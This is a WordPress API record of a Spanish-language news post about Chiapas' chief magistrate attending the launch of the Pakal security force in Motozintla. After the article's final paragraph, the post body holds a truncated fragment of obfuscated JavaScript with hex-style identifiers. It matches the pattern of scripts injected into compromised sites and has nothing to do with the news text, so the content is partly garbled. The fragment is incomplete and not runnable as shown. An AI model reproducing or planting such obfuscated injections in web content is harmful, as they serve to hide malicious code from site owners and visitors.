{"id":19555,"date":"2024-12-31T04:33:23","date_gmt":"2024-12-31T04:33:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19555"},"modified":"2024-12-31T04:33:24","modified_gmt":"2024-12-31T04:33:24","slug":"seguridad-y-justicia-moreno-guillen-asistio-al-banderazo-de-salida-de-la-fuerza-de-reaccion-inmediata-pakal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19555","title":{"rendered":"Seguridad y Justicia: Moreno Guill\u00e9n asisti\u00f3 al banderazo de salida de la Fuerza de Reacci\u00f3n Inmediata Pakal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"19556\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735619465943-1024x683.jpg\" alt=\"\" class=\"wp-image-19556\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735619465943-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735619465943-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735619465943-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735619465943.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n <\/p>\n\n\n\n<p>Motozintla, Chiapas; 30 de diciembre de 2024. \u2013 El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, al banderazo de salida del Grupo Fuerza de Reacci\u00f3n Inmediata Pakal, en el municipio de Motozintla, Chiapas.<\/p>\n\n\n\n<p>En este contexto, Moreno Guill\u00e9n destac\u00f3 la importancia de las nuevas estrategias de seguridad para la construcci\u00f3n de un Chiapas m\u00e1s seguro y en paz, subrayando la coordinaci\u00f3n entre los tres poderes del Estado, para garantizar una justicia humanista y eficaz.<\/p>\n\n\n\n<p>Desde la Sierra Madre, el magistrado presidente resalt\u00f3 que la seguridad y la justicia van de la mano, y que el compromiso del Poder Judicial es aplicar la ley con integridad, asegurando que ninguna conducta delictiva quede impune.<\/p>\n\n\n\n<p>Adem\u00e1s, expres\u00f3 su apoyo a las acciones del gobernador Ram\u00edrez Aguilar, reafirmando que en Chiapas se trabaja por un futuro en el que las y los chiapanecos puedan vivir con tranquilidad y confianza en sus instituciones.<\/p>\n\n\n\n<p>Con esta acci\u00f3n, el Poder Judicial del Estado de Chiapas refrenda su compromiso de colaborar con el Gobierno del Estado para fortalecer la seguridad y garantizar la paz y justicia en todos los rincones de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n Motozintla, Chiapas; 30 de diciembre de 2024. \u2013 El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, al banderazo de salida del Grupo Fuerza de Reacci\u00f3n Inmediata Pakal, en el municipio de Motozintla, Chiapas. En este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19556,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19555","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19555","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19555"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19555\/revisions"}],"predecessor-version":[{"id":19557,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19555\/revisions\/19557"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19556"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19555"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19555"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19555"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}